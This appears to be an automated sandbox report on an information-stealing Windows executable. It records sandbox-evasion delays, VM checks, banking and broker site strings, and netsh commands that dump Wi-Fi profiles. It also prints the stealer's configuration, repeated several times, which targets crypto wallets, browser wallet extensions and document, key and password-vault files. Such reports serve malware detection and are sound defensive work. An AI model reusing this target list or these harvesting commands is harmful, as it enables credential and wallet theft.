          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599120Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598141Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597266Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596938Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596688Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596563Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596109Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596000Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595891Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595781Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595672Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595562Jump to behavior
          Source: 73ybGtnYXx.exeBinary or memory string: qemu'
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802364192.000001B60E1C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: 73ybGtnYXx.exe, 00000000.00000002.1817181521.000001B62986D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\1
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: 73ybGtnYXx.exe, 00000000.00000002.1813211192.000001B6285C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: 73ybGtnYXx.exe, 00000000.00000002.1813211192.000001B6285C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
          Source: 73ybGtnYXx.exe, 00000000.00000002.1817181521.000001B62984D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: 73ybGtnYXx.exe, ypzCTr.csReference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, nDC4L.Id)
          Source: 73ybGtnYXx.exe, ypzCTr.csReference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
          Source: 73ybGtnYXx.exe, hm6.csReference to suspicious API methods: GetProcAddress(hH, e3A)
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeQueries volume information: C:\Users\user\Desktop\73ybGtnYXx.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.
          Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command 